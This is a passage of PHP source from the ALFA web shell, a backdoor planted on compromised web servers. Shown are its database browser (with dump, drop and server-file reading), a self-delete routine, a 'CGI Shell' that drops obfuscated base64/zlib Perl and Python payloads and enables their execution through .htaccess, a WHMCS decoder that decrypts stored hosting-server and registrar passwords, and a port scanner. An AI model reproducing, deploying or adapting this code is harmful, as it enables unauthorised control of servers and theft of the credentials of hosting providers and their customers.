5115echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
5116$tbls_res = $db->listTables();
5117while($item = $db->fetch($tbls_res)){
5118list($key, $value) = each($item);
5119if(!empty($_POST['sql_count']))
5120$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
5121$value = htmlspecialchars($value);
5122echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?' ':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
5123}
5124echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
5125if(@$_POST['alfa1'] == 'select'){
5126$_POST['alfa1'] = 'query';
5127$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
5128$db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
5129$num = $db->fetch();
5130$pages = ceil($num['n'] / 30);
5131echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
5132echo " of $pages";
5133if($_POST['alfa3'] > 1)
5134echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>< Prev</a>";
5135if($_POST['alfa3'] < $pages)
5136echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next ></a>";
5137$_POST['alfa3']--;
5138$cache_table = $_POST['alfa2'];
5139if($_POST['type']=='pgsql')
5140$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
5141else
5142$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
5143echo "<br><br>";
5144}
5145if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
5146$prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
5147$db->query(@$_POST['alfa2']);
5148if($db->res !== false){
5149$title = false;
5150echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
5151$line = 1;
5152while($item = $db->fetch()) {
5153if(!$title){
5154echo '<tr><th>#</th>';
5155foreach($item as $key => $value){
5156echo '<th>'.$key.'</th>';
5157}
5158reset($item);
5159$title=true;
5160echo '</tr><tr>';
5161$line = 2;
5162}
5163if($cache_table!=''){
5164 $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
5165}else{
5166 $cacheMsg ='-';
5167}
5168echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
5169$line = $line==1?2:1;
5170foreach($item as $key => $value){
5171if($value == null)
5172echo '<td><i>null</i></td>';
5173else
5174echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
5175}
5176echo '</tr>';
5177}
5178echo '</table>';
5179} else {
5180echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5181}
5182}
5183echo('</form>');
5184if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
5185$data = explode(':',$_POST['alfa3']);
5186echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
5187echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
5188if($data[1] != '0'){
5189$data[2] = __ZGVjb2Rlcg($data[2]);
5190$data[2] = str_replace('"','',$data[2]);
5191$fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
5192$fetch['__ALFAKEY'] = $data[1];
5193$fetch['__ALFAKEYVAL'] = $data[2];
5194}else{
5195$d = __ZGVjb2Rlcg($data[2]);
5196$fetch = json_decode($d, true);
5197}
5198foreach($fetch as $key => $value){
5199if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
5200$value = htmlspecialchars($value);
5201echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5202}
5203echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
5204}
5205if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
5206$data = json_decode($_POST['alfa2'], true);
5207$alfadata = $data['__ALFADATA'];
5208$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
5209$keyval = array();
5210echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
5211echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
5212$set = '';
5213foreach($data as $key => $value){
5214if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5215if($data2['__ALFAKEY']==$key){
5216$keyval['__ALFAKEY'] = $key;
5217$keyval['__ALFAKEYVAL'] = $value;
5218}
5219$set .= "`$key` = '".addslashes($value)."',";
5220$value = htmlspecialchars($value);
5221echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5222}
5223unset($data['__ALFADATA']);
5224
5225echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
5226
5227if(!isset($data2['__ALFAKEY'])){
5228$where = '';
5229foreach($data2 as $key => $value){
5230if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5231$value = addslashes($value);
5232$where .= "`$key` = '$value' AND ";
5233}
5234$where = substr($where, 0, -4);
5235}else{
5236$where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
5237}
5238$set = substr($set, 0, -1);
5239$db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
5240if($db->error())
5241echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5242else echo("Success...!");
5243}
5244if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
5245echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
5246<input type='hidden' name='alfa1' value='query'/>
5247<textarea name='query' style='width:100%;height:100px'>";
5248echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
5249echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
5250}
5251echo "</td></tr>";
5252}
5253echo "</table></form><br/>";
5254if($_POST['type']=='mysql') {
5255$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
5256if($db->fetch())
5257echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
5258}
5259if(@$_POST['alfa1'] == 'loadfile'){
5260$file = $db->loadFile($_POST['alfa2']);
5261echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
5262}
5263}else{
5264echo htmlspecialchars($db->error());
5265}
5266echo '</div>';
5267alfafooter();
5268}
5269function alfaselfrm(){
5270if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
5271echo(__pre().'<center>');
5272if(@unlink($GLOBALS['__file_path'])){
5273echo('<b>Shell has been removed</i> :)</b>');
5274}else{
5275echo 'unlink error!';
5276}
5277echo('</center>');
5278}
5279if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
5280echo "<div class=header>";
5281echo "
5282<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
5283echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
5284echo '</p></center></div>';
5285}
5286}
5287function alfacgishell(){
5288alfahead();
5289$div = "";
5290if(!in_array($_POST['alfa1'],array('perl','py'))){
5291$div = "</div>";
5292echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
5293}
5294if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
5295@mkdir('cgialfa',0755);
5296@chdir('cgialfa');
5297alfacgihtaccess('cgi');
5298$name = $_POST['alfa1'].'.alfa';
5299$perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
5300$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("eJylF9ty2zb22foKDLxbUqurFTvN6Na6Xqf1bNNmErcvtkcDEqCICQlwQdC26vF++54DkBLVaOO2a8/YBM79fmDNZto5knmhjSXxWtpo5v8NhWJRJsJuRzzGorCAVbCy7NSo5absA15fl/21sAjpR6wUr0/7lckyGXUSo3NiZS5IQ2FNgueGgzUsFhGLP3nUj9ZItb76uUFvzjWjBrkBFwC1K1CtIxOiS9D2XhqthikrV5/EJqQfLz5cvb9e/XT+7pJ2QfkyNrKwioFCixbBzR7iXUdkpfg9NqUdLhLCsoRd5DyMkd1RnMqMr0rLpeqT7UFX1rMvdCHUBHD3UYdxpkt06tGREWWVIXabeGgE4+EeEd62qWxlFPHEnUSbHDms5fCtFBn/aLVha8SMcw4AhA8hPvcsq0QYxEG3w6X5HMABAH4EIjDNk/owDiv170pbEfrgDqPXp1zEmosQsLqOCBgCkWf7EhFgdVuS/MfNePrqjiwWJIg5CdC3yqvgzqSHEuBvMMNvhOB38cADwLyojBHK/tNJbwKE5F3wZJFB0oTBrQr6gTdQaeu4MQWcd7SBA0hFMh2zrAwxwAc5Byj2AOs6a0DCC1z32YIqHYjdyjsPs4bZdMiiEv+HdEi7nfeQ/QVmSXBD5nCvoI42mVjQWGfaTI/Hr74+GY9ndBn06jrEsFalMGG3F8xHSLL89gXKvXK4/PDr5Ye6HLYcDsqeRIk4OXMcdmbtSO7+FqDPVysso9XKRXi1yplUqxWG2ZUwoRdaWSAd2E0hpsSKRztKbZ7dmltFG6RgjlfLeQrVsZxbaTOxvICE4iTakPMf356Ta3H+jgzIxfdX5P3GplrNRx5tngvLoMaYKYVd0F+u3w7e0OXcWbL8xxNUVyaVmCqtxOz5eLVKUNuqeEoyzeyUGLlO7UzfCwMXD1OSSs6FmnkPkOPJWZKAEx8kt+mUnJyOi8cZlyWkx2YKoUfWgwji/2mGhg12fAQUSlHKcvaQSisG4LEYrFf6wbBi9pyxSGRPOTNrqQZOBWCOvIHeSsimAcvkWk1JDupkYhZpwwXoc1I8klJnkkOD4DPsl2ujK8Wn2EAVCMEgAfbjoEwZRz3G8HsKVMfjy1fj0/Oa08AwLqtyiqDGuMkZKvBnzIgrU6KXCg0xFOZ/OMYbi+NBq/VTW2e0oQ5DJhK79bLzxLNURWVvMGsWZRXl0t491QIbeW1eLr6H3VTHEjqnWotDDng+hoby9Je4Nb77GlU+EM8D0grGYVCsB7WTSssMYJ99DhGoCd4/Y1AgtOwJxoL8TdT67aV2S/uW8o3gli5te47fup9G8PTkNaDVxX/2Jj47e1MbCI3k77siYZXVs2doA67G5iNftZHmG6IVxJMvKNdxlUMuYrO6zAR+fre54uFtAK6+hRabAAK0zBkl0dpJXNDjsfuhxOrCu3JB4YSp0Tr6T6dW65wKdLq7QGcBM28adIJYYLIs5wn0IVKLgkDSJTTcaNdlwCOClIyTryB972UpYTki/3HX9enbNfS2bBjrfD6KoP3NR8gS7G8kWFyoiHfzgp5QUmuJ3qMkhlrC+gFHOz3xXDt+QSegqEUW/IA/2mxqOxKowwX9VRjOFKMEs8IzAcX2LD2eTC4nkzcO8nFnC7lYy20jjZa1KQR6tRKxBY9YTV6YG0hlOf4xje7LoJn5RJbkJ8hDt0m5YU9bzZ7L+2bU1DWDQZ5OMEudphc6z3GGTw/Npbr0YCz1UVSfNBPJ6wTMl/Ni+UUhe5XaiG2qjBj9UII3wfNlAUGKUxF/WtAEZrygtYlBIjMR4PDHTQuttG7RPjpCQIK7Wr2F3XjUO4TVGwqEQEHZK9gwtth9ksnSuhXiiJA2k5vt4a7jBGjj4NCPc6dAA3a0KKOBDvEDx52HEOCrWnsIbm8IDT/D727xqyxb4S2QtTYbWNBGuKwlqkHEbTjcYkNIHiIo8gcDbPfZ1wvwTgLcYfaCAMiNEHQDz9gdqy6cV4gwOhlPTrdk9W5xjVMvEVDOhPZgwoQNu26Pkn99N6T7+MF1KpxEQoNeonoB1BYrSVVg0wIeZRXHoixR+GaI66d/GpFL909qeAkIY5w3PUM4dY7q5XCbAR60XSnrJXfffc2u2z0sxPPB59i2ZkZNejYpPioOFOA8cp0OXg1a+am5oDaV4FV3GMKIxibFF9ZUYtaCpL8DySTcg0q+WNwGKbTuJ3fPh+5pAXdBr15xe8Ft8OyAcQ2MrGZhpUQZs0KEQuEb4ZcPV1DdBfQGCHcbu9vtzvZY/zFqvqOmBJMXKhWmgoDWBnPo/c8frylhMfp1AUHfvfsg+Mu52zGI2zGo3/waHpwSrwXdX35xGfY7ey8ge/QYH0rATxTi2rCJKdmX4v3ZgJuT79+vxluhyyVdfqXgoTBr/32RU+oVACu0ijOJbQsCGWuVSJPD8D03gmx0BYkOH99AMOtoApEL7uwZk5nUj1DX8WZbnX7QOfQ/HBUmxza4y8xDSbgbu38mGf+P2AOSd0wOL2cJq7B1mg44s+wPJ4TfVROcnHVXMPiYwBmEjt0+H9APzcPJLbZ70bpINbznCXO9BvckhzEfOe5NPtSzqVma3dbmw7eVjFFMcdh9aaHa6oRrlYT5bX64fvfjwjnItcOb8d0QMYC7dxDebmvFfdf5d7Ytif303E+4Oh28ln+xiL5AxD6X4FNut2jtMm7kdi6c/LB94iqKz8jgv11NVZo=")),\'<string>\',\'exec\'))';
5301if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
5302if(__write_file($name,$code)){
5303@chmod($name,0755);
5304echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
5305}
5306}
5307echo $div;
5308alfafooter();
5309}
5310function alfaWhmcs(){
5311alfahead();
5312echo '<div class=header>';
5313function decrypt($string,$cc_encryption_hash){
5314$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
5315$hash_key = _hash($key);
5316$hash_length = strlen ($hash_key);
5317$string = __ZGVjb2Rlcg($string);
5318$tmp_iv = substr ($string, 0, $hash_length);
5319$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
5320$iv = $out = '';
5321$c = 0;
5322while ($c < $hash_length)
5323{
5324$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
5325++$c;
5326}
5327$key = $iv;
5328$c = 0;
5329while ($c < strlen ($string))
5330{
5331if (($c != 0 AND $c % $hash_length == 0))
5332{
5333$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
5334}
5335$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
5336++$c;
5337}
5338return $out;
5339}
5340function _hash($string)
5341{
5342if(function_exists('sha1'))
5343{
5344$hash = sha1 ($string);
5345}
5346else
5347{
5348$hash = md5 ($string);
5349}
5350$out = '';
5351$c = 0;
5352while ($c < strlen ($hash))
5353{
5354$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
5355$c += 2;
5356}
5357return $out;
5358}
5359AlfaNum(8,9,10);
5360echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
5361<input type='hidden' name='form_action' value='2'>";
5362$table = array('td1' =>
5363 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
5364 'td2' =>
5365 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
5366 'td3' =>
5367 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
5368 'td4' =>
5369 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
5370 'td5' =>
5371 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
5372);
5373create_table($table);
5374echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
5375if($_POST['alfa5']!=''){
5376$db_host=($_POST['alfa7']);
5377$db_username=($_POST['alfa3']);
5378$db_password=($_POST['alfa4']);
5379$db_name=($_POST['alfa5']);
5380$cc_encryption_hash=($_POST['alfa6']);
5381echo __pre();
5382$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
5383$query = mysqli_query($conn,"SELECT * FROM tblservers");
5384$num = mysqli_num_rows($query);
5385if ($num > 0){
5386for($i=0; $i <=$num-1; $i++){
5387$v = @mysqli_fetch_array($query);
5388$ipaddress = $v['ipaddress'];
5389$username = $v['username'];
5390$type = $v['type'];
5391$active = $v['active'];
5392$hostname = $v['hostname'];
5393echo("<center><table border='1'>");
5394$password = decrypt ($v['password'], $cc_encryption_hash);
5395echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
5396echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
5397echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
5398echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
5399echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
5400echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
5401echo "</table><br><br></center>";
5402}
5403$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
5404$num1 = @mysqli_num_rows($query1);
5405if ($num1 > 0){
5406for($i=0; $i <=$num1 -1; $i++){
5407$v = mysqli_fetch_array($query1);
5408$registrar = $v['registrar'];
5409$setting = $v['setting'];
5410$value = decrypt($v['value'], $cc_encryption_hash);
5411if ($value==""){
5412$value=0;
5413}
5414echo("<center>Domain Reseller <br><center>");
5415echo("<center><table border='1'>");
5416echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
5417echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
5418echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
5419echo "</table><br><br></center>";
5420}
5421}
5422}else{__alert('<font color="red">tblservers is Empty...!</font>');};
5423}
5424echo "</div>";
5425alfafooter();
5426}
5427function alfaportscanner(){
5428alfahead();
5429echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
5430<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
5431<input type="hidden" name="y" value="phptools">
5432<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
5433<div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
5434<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
5435</form></center><br>';
5436$start = strip_tags($_POST['alfa2']);
5437$end = strip_tags($_POST['alfa3']);
5438$host = strip_tags($_POST['alfa4']);
5439if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
5440echo __pre();
5441$packetContent = "GET / HTTP/1.1\r\n\r\n";
5442if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
5443else{
5444$packetContent = str_replace(array("\r","\n"), "", $packetContent);
5445$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
5446}
5447for($i = $start; $i<=$end; $i++){
5448$sock = @fsockopen($host, $i, $errno, $errstr, 3);
5449if($sock){
5450stream_set_timeout($sock, 5);
5451fwrite($sock, $packetContent."\r\n\r\n\x00");
5452$counter = 0;
5453$maxtry = 1;
5454$bin = "";
5455do{
5456$line = fgets($sock, 1024);
5457if(trim($line)=="")$counter++;
5458$bin .= $line;
5459}while($counter<$maxtry);
5460fclose($sock);
5461echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
5462echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
5463}
5464flush();
5465}
5466}
5467echo '</div>';
5468alfafooter();
5469}
5470function alfacgihtaccess($m,$d='', $symname=false){
5471$readme = "";
5472if($symname){$readme="\nReadmeName ".trim($symname);}
5473if($m=='cgi'){
5474$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
5475}elseif($m=='sym'){
5476$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
5477}elseif($m=='shtml'){
